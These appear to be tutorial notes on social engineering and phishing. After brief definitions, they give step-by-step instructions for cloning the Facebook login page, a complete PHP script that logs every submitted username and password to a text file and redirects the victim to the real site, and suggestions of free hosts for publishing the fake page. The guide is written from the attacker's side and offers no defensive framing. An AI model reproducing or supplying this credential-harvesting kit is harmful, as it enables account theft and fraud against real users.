Session Social engineering and phishing

1. SOCIAL ENGINEERING
2. ==================
3. Social Engineering is a term usually called for “Hacking done via Human Minds”.
4. This is an art of Manipulating human minds so that they can spit out the Confidential Information. These types of Information can be any Personal or Financial Information. This attack can only be possible through “Human Stupidity”.
5. Phishing is a sub-category of Social Engineering.
6. This step plays a very crucial role in Information gathering as you can acquire information from the victim which will later help an attacker to form a dictionary from the victim's interest and apply a brute force on places.
7.  
8.  
9. Example: https://www.youtube.com/watch?v=lc7scxvKQOo
10. To gain more knowledge one can follow KEVIN MITTNICK .
11.  
12.  
13.  
14. PHISHING ATTACKS
15. ================
16. An attack where attacker forms a fake page of a genuine website which seems ok or legit to a victim and enters the credentials such as user name , password , phone no. etc.There are basically two types of phishing .
17. 1. Spear Phishing
18. 2. Vector Phishing | Credential Harvestor
19.  
20. 1. Spear Phishing
21. -----------------
22. Targeting a single or an individual or the crowd of people having common interest. Target Specific.
23.  
24. 2. Credential Harvestor
25. -----------------------
26. It is not target specific. Any kind of person can come and enter their credentials. I just need to collect the credentials of the crowd for my own purpose.
27.  
28. CREATION OF A PHISHING WEBPAGE
29. ===============================
30. Workflow:
31. = Opening any Social Networking Website and copy its Source Code - The Scripting Code of the Web Page.
32. = Creating a PHP Page for getting the Data from the Phishing Page.
33. = A text file to store the data of the Phishing page.
34.  
35.  
36. Steps :
37. =======
38. 1. Open Your Browser
39. 2. Goto www.facebook.com (or any other website through which you want to attack a victim)
40. 3. Right Click on the login page ---> view page source
41. 4. Select all ---> copy
42. 5. Open notepad and paste the whole code
43. 6. Scroll to the very top of the code.
44. 7. Ctrl+F ---> action=
45. action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
46. 8. In the received parameter
47. https://www.facebook.com/login.php?login_attempt=1&lwv=110
48. Replace it with "anyname.php"
49.  
50.  
51. * Note : the name you redirect your phishing page will be same as the php code which will be receiving it as on pressing the action button the button will be rediricting you to a page that will perform the task of storing the credentials entered.
52.  
53. Creation of anymane.php
54. =====================
55. <?php //starting of a php code
56. header ('Location: https://www.facebook.com'); //redirection to the original webpage
57. $handle = fopen("log.txt", "a"); //Creating a text file log.txt to store data & append it
58. foreach($_POST as $variable => $value) { //running of a loop until we didn’t get the value
59. fwrite($handle, $variable); //Writing the Variable Name
60. fwrite($handle, "="); //To define the value of Equals to.
61. fwrite($handle, $value); //For writing the Username of the data
62. fwrite($handle, "\r\n"); //For creating a New Line and Returning the value
63. } // end of loop
64. fwrite($handle, "\r\n"); //For creating a New Line and Returning the value
65. fclose($handle); //saving and closing the file named log.txt
66. exit; // Exiting the PHP code
67. ?> // End of the PHP Code
68.  
69.  
70. Saving the Web Phishing Code and the anyname.php in a same location in a folder inside the Localhost server.
71.  
72. These Phishing Pages can be globally hosted via 000webhost.com or My3gb.com or any other webhosting websites.